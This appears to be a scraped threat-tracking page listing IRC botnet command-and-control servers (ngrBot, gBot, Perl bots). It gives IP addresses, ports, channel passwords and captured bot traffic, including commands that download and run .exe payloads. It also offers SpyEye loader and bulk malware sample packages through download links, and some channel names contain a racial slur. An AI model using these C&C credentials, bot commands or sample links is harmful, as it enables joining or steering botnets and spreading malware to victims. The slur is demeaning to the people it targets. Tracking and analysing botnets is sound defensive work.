Resolved : [update.jebac.net] To [212.7.214.129] Resolved : [update.jebac.net] To [212.7.203.231] update.jebac.net 212.7.214.129 api.wipmania.com api.wipmania.com 199.15.234.7 data.fuskbugg.se data.fuskbugg.se 83.233.33.6 Download URLs http://199.15.234.7/ (api.wipmania.com) http://83.233.33.6/skalman02/4e28ae2064f07_av.txt (data.fuskbugg.se) C&C Server: 212.7.214.129:1866 Server Password: Username: jbxznyp Nickname: n{DE|XPa}jbxznyp Channel: #!hot! (Password: ngrBot) Channeltopic: :.http.int 3 .msn.int 2 .http.set omfg!!# LOL!#!* http://www.designthreadz.com/facebook-pic-#####-JPEG .msn.set lolol*!!# foto?!# http://www.designthreadz.com/facebook-pic-#####-JPEG .mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n Outgoing connectionRead more...
72.20.30.30(irc botnet hosted in United States Staminus Communications)
Remote Host Port Number 72.20.30.30 20 NICK NEW[XX][XP]9032364432 USER 9032 “” “TsGh” :9032 MODE NEW[XX][XP]9032364432 JOIN #galla PONG :irc.priv8net.com Now talking in #galla Topic On: [ #galla ] [ . ] Topic By: [ cakita ] NICK NEW[XX][XP]0445084461 USER 0445 “” “TsGh” :0445 MODE NEW[XX][XP]0445084461 JOIN #Mcl PONG :irc.priv8net.com hosting infos: http://whois.domaintools.com/72.20.30.30
irc.priv8.in(linux bots hosted in United States Network Operations Center Inc)
Resolved : [irc.priv8.in] To [96.9.170.253] my $processo = ‘[httpd]’; my $linas_max=’4′; my $sleep=’6′; my $cmd=”[PHP-SHELL]”; my $id=”http://www.cricermenate.it/id.txt?”; my @adms=(“chK_”); my @canais=(“#xcr3w”); my @nickname = (“xcR3w-“.int(rand(1-000))); my $nick = $nickname[rand scalar @nickname]; my $ircname =’xcr3w’; chop (my $realname = ‘bukan sesiapa’); $servidor=’irc.priv8.in’ unless $servidor; my $porta=’6667′; hosting infos: http://whois.domaintools.com/96.9.170.253
SpyEye Loader v1.3.41
From France with love another pwnage from Xylitol Found these samples into hecker’s ftp remember this is only for analysis purposes sorry i removed the builder for security purposes Download http://9598d5df.tubeviral.com
46.105.164.74(irc botnet hosted in France Ovh Systems)
Remote Host Port Number 46.105.164.74 2109 46.105.164.74 8782 NICK [USA|635435] USER 8770 “” “lol” :8770 JOIN #moo PONG :Threat-Expert.net NICK {iNF-00-USA-XP-COMP-7188} JOIN #hold nigger PONG Threat-Expert.net USER blaze * 0 :COMP hosting infos: http://whois.domaintools.com/46.105.164.74
64.34.200.181(irc botnet hosted in United States Newhall Serverbeach)
Remote Host Port Number 195.122.131.13 80 204.0.5.41 80 63.135.80.224 80 63.135.80.46 80 64.34.200.181 1234 PASS xxx NICK NEW-[USA|00|P|99411] USER XP-0024 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|99411] -ix JOIN #!nw! test PONG 22 MOTD hosting infos: http://whois.domaintools.com/64.34.200.181
208.117.34.213(ngrBot hosted in United States Laird Hill Steadfast Networks)
Remote Host Port Number 199.101.133.144 80 199.101.133.25 80 199.15.234.7 80 208.117.34.213 1888 PASS ngrBot PRIVMSG #XP :[d=”http://dc387.4shared.com/download/k1pyhC72/robertiniii.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0 NICK n{US|XPa}mgycnpm USER mgycnpm 0 0 :mgycnpm JOIN ##center 1963.g3rb3rs1t0.3691 JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://dc355.4shared.com/download/dPl-t_0P/fdbfdf542.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataLdxaxl.exe”Read more...
bugazi.zapto.org(irc botnet hosted in United Kingdom Maidenhead Simply Transit Ltd)
bugazi.zapto.org DNS_TYPE_A 213.229.78.226 Remote Host Port Number 213.229.78.226 1244 Channels: 4 channels formed Clients: I have 325 clients and 0 servers Local users: Current Local Users: 325 Max: 550 Global users: Current Global Users: 325 Max: 550 NICK new[iRooT-XP-USA]557688 USER 1754 “” “TsGh” :1754 PONG :65FDE65C JOIN #bugazi# aalbaklub1 PONG :HTTP1.4 hosting infos: http://whois.domaintools.com/213.229.78.226
78.47.197.2(irc botnet hosted in Germany Potsdam Hetzner Online Ag)
Remote Host Port Number 199.15.234.7 80 78.47.197.2 7200 PASS cheese or PASS gBot NICK New{US-XP-x86}3313868 USER 9317 “” “9130” :25529 MODE New{US-XP-x86}3313868 3qUu JOIN #Erection# NICK n{US|XPa}wdvgswy USER wdvgswy 0 0 :wdvgswy JOIN #nig# cheese JOIN #gBot# Channelisr00t hosting infos: http://whois.domaintools.com/78.47.197.2
Around 35mb malware samples
Here again with another package from diferent malwares Download: http://adf.ly/2QFHX